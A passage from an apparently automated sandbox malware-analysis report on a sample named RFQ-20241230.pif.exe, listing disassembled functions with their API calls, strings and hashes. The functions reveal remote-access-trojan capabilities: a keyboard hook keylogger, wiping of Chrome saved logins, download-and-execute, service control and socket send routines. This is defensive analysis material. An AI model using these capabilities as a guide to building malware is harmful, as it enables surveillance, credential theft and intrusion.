                            • Instruction Fuzzy Hash: A11170B2901118AEDB10FAA58849A9EB7BCDB48714F55007BE905F3281E77C9A148A7D
                            Function 004198D2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,00474918), ref: 004198E8
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419937
                            • GetLastError.KERNEL32 ref: 00419945
                            • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041997D
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: EnumServicesStatus$ErrorLastManagerOpen
                            • String ID:
                            • API String ID: 3587775597-0
                            • Opcode ID: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
                            • Instruction ID: 19b9a1677c56063b65225fc9a0f34bb07ffc83518ef4baa2b379b487d5559ddd
                            • Opcode Fuzzy Hash: 3ac6ab5d256872219fc595c736f1fa07358be726c92bd725a469ceb362d7fbf0
                            • Instruction Fuzzy Hash: 84813F711083049BC714FB21DC959AFB7A8BF94718F50493EF582521E2EF78EA05CB9A
                            Function 0041B43F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                            • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B539
                            • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B546
                              • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                            • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                            • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B580
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B593
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                            • String ID:
                            • API String ID: 2341273852-0
                            • Opcode ID: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                            • Instruction ID: 0b65015344b940e71c8db0708908b2546b6e9c6134e65c3d42cb3d4753665141
                            • Opcode Fuzzy Hash: 0297631c5ee8ecb1d1a4c9aeac50dc6e63fd93f3a2d20230b54752594d88c721
                            • Instruction Fuzzy Hash: 4D31937180921C6ACB20D771AC49FDA77BCAF08304F4405EBF505D3182EB799AC4CA69
                            Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                            • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                            • GetLastError.KERNEL32 ref: 00409A1B
                              • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                            • TranslateMessage.USER32(?), ref: 00409A7A
                            • DispatchMessageA.USER32(?), ref: 00409A85
                            Strings
                            • Keylogger initialization failure: error , xrefs: 00409A32
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                            • String ID: Keylogger initialization failure: error
                            • API String ID: 3219506041-952744263
                            • Opcode ID: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                            • Instruction ID: 51093fa3456b5fa5e68b97b38f4420b838fb12217e42543f2b1c539fb4fc9beb
                            • Opcode Fuzzy Hash: 0b7731a1732448719b2bf699768c997a41862952e5444ada4ba6697cad37b533
                            • Instruction Fuzzy Hash: 281194716043015FC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAA
                            Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
                            • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                            • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressCloseCreateLibraryLoadProcsend
                            • String ID: SHDeleteKeyW$Shlwapi.dll
                            • API String ID: 2127411465-314212984
                            • Opcode ID: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
                            • Instruction ID: 77d0e0f665ec2cae06f71cdba8331079b705a8b2343c1238c9795aa136ea70b2
                            • Opcode Fuzzy Hash: cdf3afb16bf801ea2708effcdf9d89e84c92b75c8538a533412dad7cd73da0bf
                            • Instruction Fuzzy Hash: 0AB1B571A043006BC614BA75CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                            Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                            • GetLastError.KERNEL32 ref: 0040B261
                            Strings
                            • [Chrome StoredLogins not found], xrefs: 0040B27B
                            • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                            • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                            • UserProfile, xrefs: 0040B227
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: DeleteErrorFileLast
                            • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                            • API String ID: 2018770650-1062637481
                            • Opcode ID: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                            • Instruction ID: b4925b9b145212f78872d6bf605c5cdf000d45b1535ad2fa459343da0bf9ff5a
                            • Opcode Fuzzy Hash: c40f0bbe6ac281c9bc18074575bfe4029dca0a9d2103736dcf0ec681c75a3121
                            • Instruction Fuzzy Hash: 8C01623168410597CA0577B5ED6F8AE3624E921718F50017FF802731E6FF7A9A0586DE
                            Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                            Download Yara Rule
                            APIs
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                            • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                            • GetLastError.KERNEL32 ref: 00416B02
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                            • String ID: SeShutdownPrivilege
                            • API String ID: 3534403312-3733053543
                            • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                            • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                            • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                            • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                            Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 004089AE
                              • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                              • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                            • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000), ref: 0040450E
                              • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B90,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                              • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                              • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                              • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                            • String ID:
                            • API String ID: 4043647387-0
                            • Opcode ID: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                            • Instruction ID: 093ddd6807f9b365337d5cb0cb3505b04edbc5c9b0fee964739ae84c01535933
                            • Opcode Fuzzy Hash: 960b8c1e0533c2719e906e86d7f414d90c0ed0de55d0b27db29086ff58eb8dfa
                            • Instruction Fuzzy Hash: 50A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF506B71D2EF385E498B98
                            Function 00419BD4 Relevance: 9.0, APIs: 6, Instructions: 39serviceCOMMON
                            Download Yara Rule
                            APIs
                            • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041982A,00000000,00000000), ref: 00419BDD
                            • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041982A,00000000,00000000), ref: 00419BF2
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419BFF
                            • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041982A,00000000,00000000), ref: 00419C0A
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1C
                            • CloseServiceHandle.ADVAPI32(00000000,?,?,0041982A,00000000,00000000), ref: 00419C1F
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Service$CloseHandle$Open$ManagerStart
                            • String ID:
                            • API String ID: 276877138-0
                            • Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                            • Instruction ID: 029754fb73528063a62336f1848e5bb122dc48601db67947cc2268dfcf3d9ab0
                            • Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                            • Instruction Fuzzy Hash: 2EF089755053146FD2115B31FC88DBF2AECEF85BA6B00043AF54193191DB68CD4595F5
                            Function 00418C79 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 245fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00418ECF
                            • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F9B
                              • Part of subcall function 0041B62A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B643
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: File$Find$CreateFirstNext
                            • String ID: @CG$XCG$>G
                            • API String ID: 341183262-3030817687
                            • Opcode ID: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
                            • Instruction ID: 4fcfe6ad4d4b9cbb37a9178feb6c4e4542e518df657a804f5f9e1d603b628f73
                            • Opcode Fuzzy Hash: 391819464a0a2cf1c4ff9909739b2089b0ccf6d7ba9323d43d3e7d0fb0295bd0
                            • Instruction Fuzzy Hash: 408153315042405BC314FB61C892EEF73A9AFD1718F50493FF946671E2EF389A49C69A
                            Function 004158B9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 97libraryloadershutdownCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                              • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                              • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                              • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                              • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                            • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                            • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                            • GetProcAddress.KERNEL32(00000000), ref: 00415977
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                            • String ID: PowrProf.dll$SetSuspendState
                            • API String ID: 1589313981-1420736420
                            • Opcode ID: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                            • Instruction ID: a9af72b6b9eaf8561cd509fc4cf8b1c610007ddf0d7e7dc7bbe2947ee761077a
                            • Opcode Fuzzy Hash: ddda36ebdef431690859fd105a934bc1752b124657cc9f8586ecd1fce7ea85c4
                            • Instruction Fuzzy Hash: B22161B0604741E6CA14F7B19856AFF225A9F80748F40883FB402A71D2EF7CDC89865F
                            Function 004511F3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 0045128C
                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,00451512,?,00000000), ref: 004512B5
                            • GetACP.KERNEL32(?,?,00451512,?,00000000), ref: 004512CA
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: InfoLocale
                            • String ID: ACP$OCP
                            • API String ID: 2299586839-711371036
                            • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                            • Instruction ID: c7787d6075dc192170befbe1ddc6ff7be643600d5f5c624e054d22ce072cfab5
                            • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                            • Instruction Fuzzy Hash: 9621C432A00100A7DB348F55C900B9773A6AF54B66F5685E6FC09F7232E73ADD49C399
                            Function 0041A64F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 25COMMON
                            Download Yara Rule
                            APIs
                            • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A660
                            • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A674
                            • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67B
                            • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A68A
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Resource$FindLoadLockSizeof
                            • String ID: SETTINGS
                            • API String ID: 3473537107-594951305
                            • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                            • Instruction ID: 54a99f42213d160abf76577abca5e20a835261b5cb21c96a6540e7550e34f59b
                            • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                            • Instruction Fuzzy Hash: F3E09A7A604710ABCB211BA5BC8CD477E39E786763714403AF90592331DA359850DA59
                            Function 004513C7 Relevance: 7.7, APIs: 5, Instructions: 188COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F2E
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F3B
                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514D3
                            • IsValidCodePage.KERNEL32(00000000), ref: 0045152E
                            • IsValidLocale.KERNEL32(?,00000001), ref: 0045153D
                            • GetLocaleInfoW.KERNEL32(?,00001001,00443CFC,00000040,?,00443E1C,00000055,00000000,?,?,00000055,00000000), ref: 00451585
                            • GetLocaleInfoW.KERNEL32(?,00001002,00443D7C,00000040), ref: 004515A4
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                            • String ID:
                            • API String ID: 745075371-0
                            • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                            • Instruction ID: 411f265c59fe6ea8e7a4a7f389aa671ff947d679512e0c94986e3a05ae8bdf1c
                            • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                            • Instruction Fuzzy Hash: 4951B331900205ABDB20EFA5CC41BBF73B8AF05306F14456BFD11DB262D7789948CB69
                            Function 00407A8C Relevance: 7.7, APIs: 5, Instructions: 183fileCOMMON
                            Download Yara Rule
                            APIs
                            • __EH_prolog.LIBCMT ref: 00407A91
                            • FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                            • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                            • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407C76
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Find$File$CloseFirstH_prologNext
                            • String ID:
                            • API String ID: 1157919129-0
                            • Opcode ID: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                            • Instruction ID: 8d2d5af9b240bd76912c5a42ed9d01478aca41623b4ca31e05b92188a1ecdcc3
                            • Opcode Fuzzy Hash: bb3c5c99637699bb9b35e74f8a42f5cb21015b095231c89f3e21d62b29b5eb8a
                            • Instruction Fuzzy Hash: EE5172329041089ACB14FBA5DD969ED7778AF50318F50017EB806B31D2EF3CAB498B99
                            Function 0044801F Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448089
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 00448101
                            • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044812E
                            • _free.LIBCMT ref: 00448077
                              • Part of subcall function 00446AD5: HeapFree.KERNEL32(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
                              • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
                            • _free.LIBCMT ref: 00448243
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                            • String ID:
                            • API String ID: 1286116820-0
                            • Opcode ID: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                            • Instruction ID: 9f73030e0ab81e705d7e97d576e5185c64763d3f00745452c155363557a16cba
                            • Opcode Fuzzy Hash: c081d488f34b9915cd9b048b6b498da186ffe618eda021c7ed3f66206b9427ec
                            • Instruction Fuzzy Hash: 97512A718002099BE714EF69CC829BF77BCEF44364F11026FE454A32A1EB389E46CB58
                            Function 00406128 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 222filenetworkCOMMON
                            Download Yara Rule
                            APIs
                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: DownloadExecuteFileShell
                            • String ID: C:\Users\user\Desktop\RFQ-20241230.pif.exe$open
                            • API String ID: 2825088817-461175095
                            • Opcode ID: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
                            • Instruction ID: ed092bbb38966d98691ab8c1252c2e533cce500cde7a5ae80e96292b959be8c1
                            • Opcode Fuzzy Hash: 416f7853b316dbcf326f75883a86c549f58c6af075a40bd148702a8597430ad4
                            • Instruction Fuzzy Hash: AC61A231604340A7CA14FA76C8569BE77A69F81718F00493FBC46772E6EF3C9A05C69B
                            Function 00406AC2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 86fileCOMMON
                            Download Yara Rule
                            APIs
                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileFind$FirstNextsend
                            • String ID: x@G$x@G
                            • API String ID: 4113138495-3390264752
                            • Opcode ID: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                            • Instruction ID: 69ed09b71aae528489a15fdfe73527b1f784865601dfee234b785914c9021214
                            • Opcode Fuzzy Hash: 0d824ddd483e098b3624018aa28cbd1eeab2459e1e0cc1af35d00935aeabc74c
                            • Instruction Fuzzy Hash: 4D2147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                            Function 0041BB87 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                              • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                              • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseCreateInfoParametersSystemValue
                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                            • API String ID: 4127273184-3576401099
                            • Opcode ID: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                            • Instruction ID: f939710b15fdea32ddc266fac7b70a3034aa980cea7cdc9a443a85228e3c1b8e
                            • Opcode Fuzzy Hash: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                            • Instruction Fuzzy Hash: 69113332B8060433D514343A4E6FBAE1806D756B60FA4015FF6026A7DAFB9E4AE103DF
                            Function 00450A8F Relevance: 6.2, APIs: 4, Instructions: 236COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,0043E270,0043932C,0043E270,?,?,0043B965,FF8BC35D), ref: 00446ED3
                              • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                              • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F47
                              • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443D03,?,?,?,?,?,?,00000004), ref: 00450B71
                            • _wcschr.LIBVCRUNTIME ref: 00450C01
                            • _wcschr.LIBVCRUNTIME ref: 00450C0F
                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443D03,00000000,00443E23), ref: 00450CB2
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
